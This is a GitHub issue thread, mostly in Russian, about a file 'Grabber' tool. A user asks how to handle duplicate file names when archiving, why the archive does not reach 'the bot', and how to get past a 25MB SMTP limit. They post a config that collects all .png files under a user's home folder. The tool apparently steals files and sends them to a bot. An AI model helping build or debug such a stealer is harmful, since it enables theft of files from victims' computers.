-
Notifications
You must be signed in to change notification settings - Fork 55
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Как можно решить проблему с дубликатами файлов? #58
Comments
Можно ли попросить тебя немного добавить кода, где имена новых дубликатов файлов добавляют к имени какой-нибудь символ? |
Консоль выдает ошибку и архив не отправляется в бота |
Также интересует, можно ли обойти ограничение по SMTP 25mb |
On the first question, I find it easiest to add a random number to each file name,
and only then rename (this way only duplicates will be renamed, which will speed up the work). |
Привет!
Как можно решить проблему с дубликатами файлов?
ошибка
C:\Users\836D
1\AppData\Local\Temp\ONEFIL1\zipfile.py:1505: UserWarning: Duplicate name: 'Grabber/64.png'C:\Users\836D
1\AppData\Local\Temp\ONEFIL1\zipfile.py:1505: UserWarning: Duplicate name: 'Grabber/96.png'C:\Users\836D
1\AppData\Local\Temp\ONEFIL1\zipfile.py:1505: UserWarning: Duplicate name: 'Grabber/fre_email_hrd.png'C:\Users\836D
1\AppData\Local\Temp\ONEFIL1\zipfile.py:1505: UserWarning: Duplicate name: 'Grabber/optionalDiagnosticData.png'C:\Users\836D
1\AppData\Local\Temp\ONEFIL1\zipfile.py:1505: UserWarning: Duplicate name: 'Grabber/blurrect.png'ошибка
настройка граббера хочу получить файлы из всего каталога С диска
],
grabbers=[
Grabber(
paths=[rf"C:\Users{getuser()}"],
file_types=[".png"],
check_sub_folders=True
)
]
).run()
The text was updated successfully, but these errors were encountered: